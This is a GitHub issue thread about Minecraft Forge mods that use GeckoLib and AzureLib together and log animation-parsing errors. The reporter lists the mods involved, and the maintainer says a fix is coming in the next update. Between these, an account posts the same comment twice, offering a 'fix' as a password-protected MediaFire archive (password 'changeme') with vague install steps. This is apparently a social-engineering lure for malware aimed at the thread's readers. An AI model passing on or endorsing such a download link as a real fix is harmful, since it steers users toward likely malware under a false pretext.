### ISSUE TITLE
If you add two mods with different animation mods, it will break the GeckoLib 4 & AzureLib together

### ISSUE THREAD

**Issue by Krimatoria** [AzureDoom/AzureLib#67]
Forge 1.20.1 47.3.0

### 

> Is it possible to create compatibility between libraries?

>  If the animation breaks, then maybe the author of the mod can fix it? (Born in Chaos. Another World)

It is easy to check if you install for example Born in Chaos it uses GeckoLib. Installs the second mod, for example From Another World, it already uses AzureLib. AzureLib's animations also break down. 

And it is unclear whether this affects all mods or some specific ones, it is still difficult to say..if this is a special case, it's not so critical, but with SckulkHorde it definitely works the same way. 

I do not know if it is possible to create some kind of compatibility between these animation mods. It's just that suddenly it's possible. 

https://gist.github.com/Krimatoria/3691fd1f9fcf2b3c9d6a0d8c1bbb3277

[azurelib/]: Unable to parse animation: attack
[so.be.ge.GeckoLib/]: Unable to parse animation: attack

Mod List:
1. azurelib-neo-1.20.1-2.0.30.jar
2. born_in_chaos_[Forge]1.20.1_1.3.1.jar
3. FromAnotherLibrary-forge-1.20.1-1.0.2.jar
4. from-another-world-1.2A.1-forge.jar
5. geckolib-forge-1.20.1-4.4.9.jar

UPD: Although visually, I didn't see any broken animations.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by AzureDoom** [comment]
This will be pushed in the next update pending some testing for another fix.
